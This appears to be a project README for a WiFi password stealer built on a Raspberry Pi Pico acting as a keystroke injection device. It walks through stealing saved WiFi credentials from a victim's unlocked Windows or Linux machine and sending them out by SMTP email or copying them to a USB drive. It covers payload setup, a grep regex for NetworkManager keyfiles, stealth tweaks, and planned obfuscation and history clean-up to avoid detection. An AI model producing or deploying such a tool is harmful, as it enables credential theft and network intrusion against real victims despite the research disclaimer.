Have you ever watched a film where a hacker would plug-in a seemingly ordinary USB drive into a victim's computer and steal data from it? - Today, you will build exactly that.
โ ๏ธ Disclaimer: All content in this project is intended for security research purposes only.
- WiFi password stealer
During the summer of 2022, I decided to do exactly that: build a device that will allow me to steal data from a victim's computer. So, how does one deploy malware and exfiltrate data? In the following text, I will explain all of the necessary steps, theory, and nuances when it comes to building your own keystroke injection tool. While this project focuses on WiFi passwords, the payload code could easily be altered to do something more nefarious. You are only limited by your imagination and your technical skills.
After creating pico-ducky, you only need to copy the modified payload (adjusted for your SMTP details for the Windows exploit and/or adjusted for the Linux password and a USB drive name) to the RPi Pico.
Physical access to the unlocked victim's computer.
The computer has to have internet access in order to send the stolen data using SMTP for exfiltration over a network medium.
Knowledge of the victim's computer password for the Linux exploit.
- Raspberry Pi Pico (RPi Pico)
- Micro USB to USB Cable
- Jumper Wire (optional)
- pico-ducky: Transformed RPi Pico into a USB Rubber Ducky
- USB flash drive (for the exploit over a physical medium only)
๐ Note:
It is possible to build this tool using the Rubber Ducky, but keep in mind that RPi Pico costs about $4.00 and the Rubber Ducky costs $80.00.
However, while pico-ducky is a good and budget-friendly solution, Rubber Ducky does offer things like stealthiness and usage of the latest DuckyScript version.
In order to use Ducky Script to write the payload on your RPi Pico, you first need to convert it to a pico-ducky. Follow these simple steps in order to create pico-ducky.
A keystroke injection tool, once connected to a host machine, executes malicious commands by running code that mimics keystrokes entered by a user. While it looks like a USB drive, it acts like a keyboard that types in a preprogrammed payload. Tools like Rubber Ducky can type over 1,000 words per minute. Once created, anyone with physical access can deploy this payload with ease.
The payload uses STRING
command to processes injection keystrokes. It accepts one or more alphanumeric/punctuation characters and will type the remainder of the line exactly as-is into the target machine. The ENTER
/SPACE
will simulate a press of keyboard keys.
We use DELAY
command to temporarily pause execution of the payload. This is useful when a payload needs to wait for an element, such as a Command Line, to load. Delay is useful when used at the very beginning, when a new USB device is connected to a targeted computer. Initially, the computer must complete a set of actions before it can begin accepting input commands. In the case of HIDs setup time is very short. In most cases, it takes a fraction of a second because the drivers are built-in. However, in some instances, a slower PC may take longer to recognize the pico-ducky. The general advice is to adjust the delay time according to your target.
Data exfiltration is the unauthorized transfer of data from a computer/device. Once the data is collected, an adversary can package it to avoid detection while sending data over the network using encryption or compression. Two most common ways of exfiltration are:
- Exfiltration over the network medium.
This approach was used for the Windows exploit. The whole payload can be seen here.
- Exfiltration over a physical medium.
This approach was used for the Linux exploit. The whole payload can be seen here.
In order to use the Windows payload (payload1.dd
), you don't need to connect any jumper wire between pins.
Once passwords have been exported to the .txt
file, payload will send the data to the appointed email using Yahoo SMTP. For more detailed instructions, visit the following link. Also, the payload template needs to be updated with your SMTP information, meaning that you need to update RECEIVER_EMAIL
, SENDER_EMAIL
, and your email PASSWORD
. In addition, you could also update the body and the subject of the email.
๐ Note:
After sending data over the email, the
.txt
file is deleted.You can also use an SMTP from another email provider, but you should be mindful of the SMTP server and port numbers you will write in the payload.
Keep in mind that some networks could be blocking the usage of an unknown SMTP at the firewall.
In order to use the Linux payload (payload2.dd
) you need to connect a jumper wire between GND
and GPIO5
in order to comply with the code in code.py
on your RPi Pico. For more information about how to setup multiple payloads on your RPi Pico, visit this link.
Once passwords have been exported from the computer, data will be saved to the designated USB flash drive. In order for this payload to function properly, it needs to be updated with the correct name of your USB drive, meaning you will need to replace USBSTICK
with the name of your USB drive in two places.
In addition, you will also need to update the Linux PASSWORD
in the payload in three places. As stated above, in order for this exploit to be successful, you will need to know the victim's Linux machine password, which makes this attack less plausible.
In order to run the wifi_passwords_print.sh
script you will need to update the script with the correct name of your USB stick after which you can type in the following command in your terminal:
echo PASSWORD | sudo -S sh wifi_passwords_print.sh USBSTICK
where PASSWORD
is your account's password and USBSTICK
is the name for your USB device.
NetworkManager is based on the concept of connection profiles, and it uses plugins for reading/writing data. It uses .ini-style
keyfile format and stores network configuration profiles. The keyfile is a plugin that supports all the connection types and capabilities that NetworkManager has. The files are located in /etc/NetworkManager/system-connections/. Based on the keyfile format, the payload uses the grep
command with regex in order to extract data of interest. For file filtering, a modified positive lookbehind assertion was used ((?<=keyword)
). While the positive lookbehind assertion will match at a certain position in the string, sc. at a position right after the keyword without making that text itself part of the match, the regex (?<=keyword).*
will match any text after the keyword. This allows the payload to match the values after SSID and psk (pre-shared key) keywords.
For more information about NetworkManager here is some useful links:
Below is an example of the exfiltrated and formatted data from a victim's machine in a .txt
file.
One of the advantages of Rubber Ducky over RPi Pico is that it doesn't show up as a USB mass storage device once plugged in. Once plugged into the computer, all the machine sees it as a USB keyboard. This isn't a default behavior for the RPi Pico. If you want to prevent your RPi Pico from showing up as a USB mass storage device when plugged in, you need to connect a jumper wire between pin 18 (GND
) and pin 20 (GPIO15
). For more details visit this link.
๐ก Tip:
- Upload your payload to RPi Pico before you connect the pins.
- Don't solder the pins because you will probably want to change/update the payload at some point.
When creating a functioning payload file, you can use the writer.py
script, or you can manually change the template file. In order to run the script successfully you will need to pass, in addition to the script file name, a name of the OS (windows or linux) and the name of the payload file (e.q. payload1.dd). Below you can find an example how to run the writer script when creating a Windows payload.
python3 writer.py windows payload1.dd
This pico-ducky currently works only on Windows OS.This attack requires physical access to an unlocked device in order to be successfully deployed.
The Linux exploit is far less likely to be successful, because in order to succeed, you not only need physical access to an unlocked device, you also need to know the admins password for the Linux machine.
Machine's firewall or network's firewall may prevent stolen data from being sent over the network medium.
Payload delays could be inadequate due to varying speeds of different computers used to deploy an attack.
The pico-ducky device isn't really stealthy, actually it's quite the opposite, it's really bulky especially if you solder the pins.
Also, the pico-ducky device is noticeably slower compared to the Rubber Ducky running the same script.
If theCaps Lock
is ON, some of the payload code will not be executed and the exploit will fail.If the computer has a non-English Environment set, this exploit won't be successful.
Currently, pico-ducky doesn't support DuckyScript 3.0, only DuckyScript 1.0 can be used. If you need the 3.0 version you will have to use the Rubber Ducky.
- Fix
Caps Lock
bug. - Fix non-English Environment bug.
- Obfuscate the command prompt.
- Implement exfiltration over a physical medium.
- Create a payload for Linux.
- Encode/Encrypt exfiltrated data before sending it over email.
- Implement indicator of successfully completed exploit.
- Implement command history clean-up for Linux exploit.
- Enhance the Linux exploit in order to avoid usage of
sudo
.